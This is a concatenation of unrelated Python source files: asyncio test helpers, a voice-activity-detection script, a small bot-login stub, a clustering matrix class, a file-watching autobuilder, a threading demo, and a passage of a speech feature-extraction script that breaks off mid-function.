httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
assert fd in self.readers, 'fd {} is not registered'.format(fd)
handle = self.readers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: "
"{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def unpatch_get_running_loop(self):
events._get_running_loop = self._get_running_loop
def setUp(self):
self._get_running_loop = events._get_running_loop
events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available',
return_value=False)
|
VoiceActivityDetection.py
|
import wave
import threading
import numpy as np
import torch
torch.set_num_threads(1)
import torchaudio
import matplotlib.pylab as plt
torchaudio.set_audio_backend("soundfile")
import pyaudio
import time
from io import BytesIO
# import globalVAR
plt.rcParams["figure.figsize"]=(12,3)
model, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',
model='silero_vad')
(get_speech_ts,
get_speech_ts_adaptive,
save_audio,
read_audio,
state_generator,
single_audio_stream,
collect_chunks) = utils
# model, utils = sendMU()
global vc1, vc2, vc3, vc4
global sc1, sc2, sc3, sc4
sc1 = 0
sc2 = 0
sc3 = 0
sc4 = 0
vc1 = []
vc2 = []
vc3 = []
vc4 = []
def validate(model,
inputs: torch.Tensor):
with torch.no_grad():
outs = model(inputs)
return outs
def int2float(sound):
abs_max = np.abs(sound).max()
sound = sound.astype('float32')
if abs_max > 0:
sound *= 1/abs_max
sound = sound.squeeze() # depends on the use case
return sound
SAMPLE_RATE = 16000
frames_to_record = 20 # frames_to_record * frame_duration_ms = recording duration
frame_duration_ms = 250
# audio = pyaudio.PyAudio()
# data = []
# voiced_confidences = []
# test_confidences = []
# from jupyterplot import ProgressPlot
continue_recording = True
def stop():
input("Press Enter to stop the recording:")
global continue_recording
continue_recording = False
# def multi_audio():
# vadStart("SampleAudio1.wav")
# vadStart("SampleAudio2.wav")
# vadStart("SampleAudio3.wav")
# vadStart("SampleAudio4.wav")
def vadStart(wavPATH, sCount):
audio = pyaudio.PyAudio()
# wave.open(wavPATH, 'rb')
with wave.open(wavPATH, 'rb') as f:
width = f.getsampwidth()
channels = f.getnchannels()
rate = f.getframerate()
# stream = audio.open(
# format=width,
# channels=channels,
# rate=rate,
# frames_per_buffer=int(rate / 10),
# output = True
# )
startTime=time.time()
data = []
voiced_confidences = [] #이게 문제가 될 수도?
test_confidences = []
global continue_recording
continue_recording = True
# stop_listener = threading.Thread(target=stop)
# stop_listener.start()
isAgain = False
temp_confidence = []
speechCount = 0
checkTime = 0
i=1
while continue_recording:
# audio_chunk = stream.read(int(SAMPLE_RATE * frame_duration_ms / 1000.0), exception_on_overflow=False)
audio_chunk = f.readframes(int(SAMPLE_RATE * frame_duration_ms / 1000.0))
# print(type(audio_chunk))
# print(int(SAMPLE_RATE * frame_duration_ms / 1000.0))
# data.append(audio_chunk)
audio_int16 = np.frombuffer(audio_chunk, np.int16)
audio_float32 = int2float(audio_int16)
# if(int(time.time()-startTime)):
# print(i, "초!")
# i=i+1
# get the confidences and add them to the list to plot them later
vad_outs = validate(model, torch.from_numpy(audio_float32))
# get the confidence value so that jupyterplot can process it
new_confidence = vad_outs[:, 1].numpy()[0].item()
# new_confidence = vad_outs[:, 1]
if new_confidence>0.2 and isAgain is False: #threshold 이상!
isAgain = True
checkTime = time.time()
if isAgain is True:
temp_confidence.append(new_confidence)
nowTime=time.time()
if nowTime - checkTime > 10: #6초의 타임스팬에서
temp_avg = sum(temp_confidence)/len(temp_confidence)
temp_spoken = sum(map(lambda x: x > 0.2, temp_confidence))
temp_spoken_ratio = temp_spoken/len(temp_confidence)
if temp_spoken_ratio>0.04: #말을 한 비율이 20%정도면 발표로 인식
speechCount+=1
balpyo_time = nowTime-startTime
print("발표! {}분 {}초".format(int(balpyo_time/60), int(balpyo_time%60)))
temp_confidence.clear()
isAgain=False
if len(voiced_confidences)>50 :
del voiced_confidences[0]
voiced_confidences.append(new_confidence)
test_confidences.append(new_confidence)
# print(wavPATH,"\t\t\t", voiced_confidences, "\n\n\n")
sCount.value = speechCount
if wavPATH=='record1.wav':
global vc1, sc1
vc1 = voiced_confidences
sc1 = speechCount
# print(vc1, sc1)
# que.put("1")
elif wavPATH=='record2.wav':
global vc2, sc2
vc2 = voiced_confidences
sc2 = speechCount
# print(vc2, sc2)
# que.put("2")
elif wavPATH=='record3.wav':
global vc3, sc3
vc3 = voiced_confidences
sc3 = speechCount
# print(vc3, sc3)
# globalVAR.vc3.append(voiced_confidences)
elif wavPATH=='record4.wav':
global vc4, sc4
vc4 = voiced_confidences
sc4 = speechCount
# print(vc4, sc4)
# globalVAR.vc4.append(voiced_confidences)
# print(type(voiced_confidences))
# pp.update(new_confidence)
#여기가 플롯팅 파트인데 잠시
plt.switch_backend('agg')
plt.clf()
plt.ylim([0,1])
plt.xticks([])
plt.plot(voiced_confidences)
plt.axhline(y=0.7, color='r')
plt.pause(0.00001)
print("\n\n총 발표 횟수 : ",speechCount)
# pp.finalize()
# plt.plot(new_confidence)
# plt.figure(figsize=(12, 6))
endTime = time.time()
timeSpan = endTime-startTime
# print(timeSpan)
# print(voiced_confidences)
count = sum(map(lambda x: x > 0.7, test_confidences))
length = len(test_confidences)
# print("발화 비율 : ", (count/length)*100, "%")
# plt.savefig('vad_result.png', bbox_inches='tight')
# plt.show()
def setVADdata(sampleNum):
global vc1, vc2, vc3, vc4
global sc1, sc2, sc3, sc4
# return voiced_confidences
if sampleNum==1:
return vc1, sc1
elif sampleNum==2:
return vc2, sc2
elif sampleNum==3:
return vc3, sc3
elif sampleNum==4:
return vc4, sc4
def setVC1():
global vc1
return vc1
def setVC2():
global vc2
return vc2
def setSC1():
global sc1
return sc1
def setSC2():
global sc2
return sc2
def setSC3():
global sc3
return sc3
def setSC4():
global sc4
return sc4
def getPlot(imgNum):
plt.clf()
plt.ylim([0,1])
plt.xticks([])
plt.axhline(y=0.7, color='r')
imgNum = BytesIO()
if imgNum==1:
plt.plot(vc1)
plt.savefig(imgNum, format='png', bbox_inches='tight', dpi=200)
return imgNum
elif imgNum==2:
plt.plot(vc2)
plt.savefig(imgNum, format='png', bbox_inches='tight', dpi=200)
return imgNum
elif imgNum==3:
plt.plot(vc3)
plt.savefig(imgNum, format='png', bbox_inches='tight', dpi=200)
return imgNum
elif imgNum==4:
plt.plot(vc4)
plt.savefig(imgNum, format='png', bbox_inches='tight', dpi=200)
return imgNum
# plt.pause(0.00001)
|
Xwars.py
|
from wariors import Xbots
import json, threading, codecs
def login(name, auth):
bot = Xbots(name, auth)
threading.Thread(target=login, args=('b1','TOKEN_BOT')).start()
print("""
░▀░ █▀▀▄ █▀▀ █░█ █▀▀▄ █▀▀█ ▀▀█▀▀ █▀▀
▀█▀ █░░█ █▀▀ ▄▀▄ █▀▀▄ █░░█ ░░█░░ ▀▀█
▀▀▀ ▀░░▀ ▀▀▀ ▀░▀ ▀▀▀░ ▀▀▀▀ ░░▀░░ ▀▀▀
▄█░ ░█▀█░ ▄ █▀▀█ ▄▀▀▄ ▄ █▀█ █▀▀█ ▄█░ ▄▀▀▄
░█░ █▄▄█▄ ░ █▄▀█ █▄▄░ ░ ░▄▀ █▄▀█ ░█░ ▀▄▄█
▄█▄ ░░░█░ ▀ █▄▄█ ▀▄▄▀ ▀ █▄▄ █▄▄█ ▄█▄ ░▄▄▀ """)
|
matrix.py
|
#
# This is part of "python-cluster". A library to group similar items together.
# Copyright (C) 2006 Michel Albert
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import logging
from multiprocessing import Process, Queue, current_process
logger = logging.getLogger(__name__)
class Matrix(object):
"""
Object representation of the item-item matrix.
"""
def __init__(self, data, combinfunc, symmetric=False, diagonal=None):
"""
Takes a list of data and generates a 2D-matrix using the supplied
combination function to calculate the values.
:param data: the list of items.
:param combinfunc: the function that is used to calculate teh value in a
cell. It has to cope with two arguments.
:param symmetric: Whether it will be a symmetric matrix along the
diagonal. For example, if the list contains integers, and the
combination function is ``abs(x-y)``, then the matrix will be
symmetric.
:param diagonal: The value to be put into the diagonal. For some
functions, the diagonal will stay constant. An example could be the
function ``x-y``. Then each diagonal cell will be ``0``. If this
value is set to None, then the diagonal will be calculated.
"""
self.data = data
self.combinfunc = combinfunc
self.symmetric = symmetric
self.diagonal = diagonal
def worker(self):
"""
Multiprocessing task function run by worker processes
"""
tasks_completed = 0
for task in iter(self.task_queue.get, 'STOP'):
col_index, item, item2 = task
if not hasattr(item, '__iter__') or isinstance(item, tuple):
item = [item]
if not hasattr(item2, '__iter__') or isinstance(item2, tuple):
item2 = [item2]
result = (col_index, self.combinfunc(item, item2))
self.done_queue.put(result)
tasks_completed += 1
logger.info("Worker %s performed %s tasks",
current_process().name,
tasks_completed)
def genmatrix(self, num_processes=1):
"""
Actually generate the matrix
:param num_processes: If you want to use multiprocessing to split up the
work and run ``combinfunc()`` in parallel, specify
``num_processes > 1`` and this number of workers will be spun up,
the work is split up amongst them evenly.
"""
use_multiprocessing = num_processes > 1
if use_multiprocessing:
self.task_queue = Queue()
self.done_queue = Queue()
self.matrix = []
logger.info("Generating matrix for %s items - O(n^2)", len(self.data))
if use_multiprocessing:
logger.info("Using multiprocessing on %s processes!", num_processes)
if use_multiprocessing:
logger.info("Spinning up %s workers", num_processes)
processes = [Process(target=self.worker) for i in range(num_processes)]
[process.start() for process in processes]
for row_index, item in enumerate(self.data):
logger.debug("Generating row %s/%s (%0.2f%%)",
row_index,
len(self.data),
100.0 * row_index / len(self.data))
row = {}
if use_multiprocessing:
num_tasks_queued = num_tasks_completed = 0
for col_index, item2 in enumerate(self.data):
if self.diagonal is not None and col_index == row_index:
# This is a cell on the diagonal
row[col_index] = self.diagonal
elif self.symmetric and col_index < row_index:
# The matrix is symmetric and we are "in the lower left
# triangle" - fill this in after (in case of multiprocessing)
pass
# Otherwise, this cell is not on the diagonal and we do indeed
# need to call combinfunc()
elif use_multiprocessing:
# Add that thing to the task queue!
self.task_queue.put((col_index, item, item2))
num_tasks_queued += 1
# Start grabbing the results as we go, so as not to stuff all of
# the worker args into memory at once (as Queue.get() is a
# blocking operation)
if num_tasks_queued > num_processes:
col_index, result = self.done_queue.get()
row[col_index] = result
num_tasks_completed += 1
else:
# Otherwise do it here, in line
if not hasattr(item, '__iter__') or isinstance(item, tuple):
item = [item]
if not hasattr(item2, '__iter__') or isinstance(item2, tuple):
item2 = [item2]
row[col_index] = self.combinfunc(item, item2)
if self.symmetric:
# One more iteration to get symmetric lower left triangle
for col_index, item2 in enumerate(self.data):
if col_index >= row_index:
break
# post-process symmetric "lower left triangle"
row[col_index] = self.matrix[col_index][row_index]
if use_multiprocessing:
# Grab the remaining worker task results
while num_tasks_completed < num_tasks_queued:
col_index, result = self.done_queue.get()
row[col_index] = result
num_tasks_completed += 1
row_indexed = [row[index] for index in range(len(self.data))]
self.matrix.append(row_indexed)
if use_multiprocessing:
logger.info("Stopping/joining %s workers", num_processes)
[self.task_queue.put('STOP') for i in range(num_processes)]
[process.join() for process in processes]
logger.info("Matrix generated")
def __str__(self):
"""
Returns a 2-dimensional list of data as text-string which can be
displayed to the user.
"""
# determine maximum length
maxlen = 0
colcount = len(self.data[0])
for col in self.data:
for cell in col:
maxlen = max(len(str(cell)), maxlen)
format = " %%%is |" % maxlen
format = "|" + format * colcount
rows = [format % tuple(row) for row in self.data]
return "\n".join(rows)
|
autoreloader.py
|
import os
import time
import traceback
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, FileSystemEvent
import subprocess
import shlex
import threading
from plbuilder.paths import SOURCE_PATH
def autobuild():
"""
Starts a process which watches for file system events on sources in the current pl-builder project, and
automatically builds sources in response to changes.
"""
autobuild_at_path(SOURCE_PATH)
def autobuild_at_path(watch_path: str):
# setting up inotify and specifying path to watch
print(f'Starting autobuilder, watching for changes in {watch_path}')
observer = Observer()
event_handler = AutoBuildEventHandler()
observer.schedule(event_handler, watch_path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
old = 0.0
class AutoBuildEventHandler(FileSystemEventHandler):
def on_modified(self, event: FileSystemEvent):
global old
super().on_modified(event)
if event.src_path.endswith('.py'):
# Watchdog has a bug where two events will be triggered very quickly for one modification.
# Track whether it's been at least a half second since the last modification, and only then
# consider it a valid event
stat_buf = os.stat(event.src_path)
new = stat_buf.st_mtime
if (new - old) > 0.5:
# This is a valid event, now the main logic
self._build(event.src_path)
old = new
def _build(self, file_path: str):
"""
Run build using subprocess so that imports will be executed every time
:param file_path:
:return:
"""
command = f'plbuilder build {file_path}'
run_command(command)
def run_command(command):
p = subprocess.Popen(shlex.split(command), stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
t = threading.Thread(target=_stdout_printer, args=(p,))
t.start()
p.stdin.close()
t.join()
def _stdout_printer(p):
for line in p.stdout:
print(line.rstrip())
|
multithread2.py
|
"""
使用多线程的情况 - 模拟多个下载任务
Version: 0.1
Author: BDFD
Date: 2018-03-20
"""
from random import randint
from threading import Thread
from time import time, sleep
def download_task(filename):
print('开始下载%s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
print('%s下载完成! 耗费了%d秒' % (filename, time_to_download))
def main():
start = time()
thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',))
thread1.start()
thread2 = Thread(target=download_task, args=('Peking Hot.avi',))
thread2.start()
thread1.join()
thread2.join()
end = time()
print('总共耗费了%.3f秒' % (end - start))
if __name__ == '__main__':
main()
|
feature_extract.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# based on PyTorch implementation for WaveNet vocoder by Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
import multiprocessing as mp
import os
import sys
from distutils.util import strtobool
import logging
import numpy as np
from numpy.matlib import repmat
from scipy.interpolate import interp1d
import soundfile as sf
from scipy.signal import firwin
from scipy.signal import lfilter
import librosa
from utils import find_files
from utils import read_txt
from utils import write_hdf5, read_hdf5
from multiprocessing import Array
import pysptk as ps
import pyworld as pw
#np.set_printoptions(threshold=np.inf)
FS = 24000
SHIFTMS = 5
MINF0 = 40
MAXF0 = 700
WINMS = 27.5
MEL_DIM = 80
MCEP_DIM = 49
MCEP_ALPHA = 0.466 #24k
FFTL = 2048
IRLEN = 1024
LOWPASS_CUTOFF = 20
HIGHPASS_CUTOFF = 65
OVERWRITE = True
MAX_CODEAP = -8.6856974912498e-12
def melsp(x, n_mels=MEL_DIM, n_fft=FFTL, shiftms=SHIFTMS, winms=WINMS, fs=FS):
hop_length = int((fs/1000)*shiftms)
win_length = int((fs/1000)*winms)
stft = librosa.core.stft(x, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window='hann')
magspec = np.abs(stft)
melfb = librosa.filters.mel(fs, n_fft, n_mels=n_mels)
return np.dot(melfb, magspec).T
def low_cut_filter(x, fs, cutoff=HIGHPASS_CUTOFF):
"""FUNCTION TO APPLY LOW CUT FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low cut filter
Return:
(ndarray): Low cut filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
fil = firwin(1023, norm_cutoff, pass_zero=False)
lcf_x = lfilter(fil, 1, x)
return lcf_x
def analyze(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=60.0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def analyze_range(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=minf0, f0_ceil=maxf0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def read_wav(wav_file, cutoff=HIGHPASS_CUTOFF):
x, fs = sf.read(wav_file)
if cutoff != 0:
x = low_cut_filter(x, fs, cutoff)
return fs, x
def convert_f0(f0, f0_mean_src, f0_std_src, f0_mean_trg, f0_std_trg):
nonzero_indices = f0 > 0
cvf0 = np.zeros(len(f0))
cvf0[nonzero_indices] = \
np.exp((f0_std_trg/f0_std_src)*(np.log(f0[nonzero_indices])-f0_mean_src)+f0_mean_trg)
return cvf0
def mod_pow(cvmcep, mcep, alpha=MCEP_ALPHA, irlen=IRLEN):
cv_e = ps.mc2e(cvmcep, alpha=alpha, irlen=irlen)
r_e = ps.mc2e(mcep, alpha=alpha, irlen=irlen)
dpow = np.log(r_e/cv_e) / 2
mod_cvmcep = np.copy(cvmcep)
mod_cvmcep[:,0] += dpow
return mod_cvmcep
def extfrm(data, npow, power_threshold=-20):
T = data.shape[0]
if T != len(npow):
raise("Length of two vectors is different.")
valid_index = np.where(npow > power_threshold)
extdata = data[valid_index]
assert extdata.shape[0] <= T
return extdata, valid_index
def spc2npow(spectrogram):
npow = np.apply_along_axis(spvec2pow, 1, spectrogram)
meanpow = np.mean(npow)
npow = 10.0 * np.log10(npow/meanpow)
return npow
def spvec2pow(specvec):
fftl2 = len(specvec) - 1
fftl = fftl2 * 2
power = specvec[0] + specvec[fftl2]
for k in range(1, fftl2):
power += 2.0 * specvec[k]
power /= fftl
return power
def low_pass_filter(x, fs, cutoff=LOWPASS_CUTOFF, padding=True):
"""FUNCTION TO APPLY LOW PASS FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low pass filter
Return:
(ndarray): Low pass filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
numtaps = 255
fil = firwin(numtaps, norm_cutoff)
x_pad = np.pad(x, (numtaps, numtaps), 'edge')
lpf_x = lfilter(fil, 1, x_pad)
lpf_x = lpf_x[numtaps + numtaps // 2: -numtaps // 2]
return lpf_x
def convert_continuos_f0(f0):
"""CONVERT F0 TO CONTINUOUS F0
Args:
f0 (ndarray): original f0 sequence with the shape (T)
Return:
(ndarray): continuous f0 with the shape (T)
"""
# get uv information as binary
uv = np.float32(f0 != 0)
# get start and end of f0
start_f0 = f0[f0 != 0][0]
end_f0 = f0[f0 != 0][-1]
# padding start and end of f0 sequence
start_idx = np.where(f0 == start_f0)[0][0]
end_idx = np.where(f0 == end_f0)[0][-1]
f0[:start_idx] = start_f0
f0[end_idx:] = end_f0
# get non-zero frame index
nz_frames = np.where(f0 != 0)[0]
# perform linear interpolation
f = interp1d(nz_frames, f0[nz_frames])
cont_f0 = f(np.arange(0, f0.shape[0]))
return uv, cont_f0
def convert_continuos_codeap(codeap):
"""CONVERT codeap TO CONTINUOUS codeap
Args:
codeap (ndarray): original codeap sequence with the shape (T)
Return:
(ndarray): continuous codeap with the shape (T)
"""
# get uv information as binary
uv = np.float32(codeap < MAX_CODEAP)
# get start and end of codeap
start_codeap = codeap[codeap < MAX_CODEAP][0]
end_codeap = codeap[codeap < MAX_CODEAP][-1]
# padding start and end of codeap sequence
start_idx = np.where(codeap == start_codeap)[0][0]
end_idx = np.where(codeap == end_codeap)[0][-1]
codeap[:start_idx] = start_codeap
codeap[end_idx:] = end_codeap
# get non-zero frame index
nz_frames = np.where(codeap < MAX_CODEAP)[0]
# perform linear interpolation
f = interp1d(nz_frames, codeap[nz_frames])
cont_codeap = f(np.arange(0, codeap.shape[0]))
return uv, cont_codeap
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the log")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--hdf5dir", default=None,
help="directory to save hdf5")
parser.add_argument(
"--wavdir", default=None,
help="directory to save of analysis-synthesis WORLD wav file")
parser.add_argument(
"--wavgfdir", default=None,
help="directory to save of analysis-synthesis Griffin-Lim wav file")
parser.add_argument(
"--wavfiltdir", default=None,
help="directory to save of preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--shiftms", default=SHIFTMS,
type=float, help="Frame shift in msec for WORLD extract.")
parser.add_argument(
"--minf0", default=MINF0,
type=int, help="minimum f0")
parser.add_argument(
"--maxf0", default=MAXF0,
type=int, help="maximum f0")
parser.add_argument(
"--winms", default=WINMS,
type=float, help="Frame shift in msec for Mel-Spectrogram extract.")
parser.add_argument(
"--mcep_dim", default=MCEP_DIM,
type=int, help="Dimension of mel-cepstrum")
parser.add_argument(
"--mel_dim", default=MEL_DIM,
type=int, help="Dimension of mel-spectrogram")
parser.add_argument(
"--mcep_alpha", default=MCEP_ALPHA,
type=float, help="Alpha of mel cepstrum")
parser.add_argument(
"--pow", default=-20,
type=float, help="Power threshold")
parser.add_argument(
"--fftl", default=FFTL,
type=int, help="FFT length")
parser.add_argument("--init", default=False,
type=strtobool, help="flag for computing stats with initial configs.")
parser.add_argument(
"--highpass_cutoff", default=HIGHPASS_CUTOFF,
type=int, help="Cut off frequency in lowpass filter")
parser.add_argument(
"--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
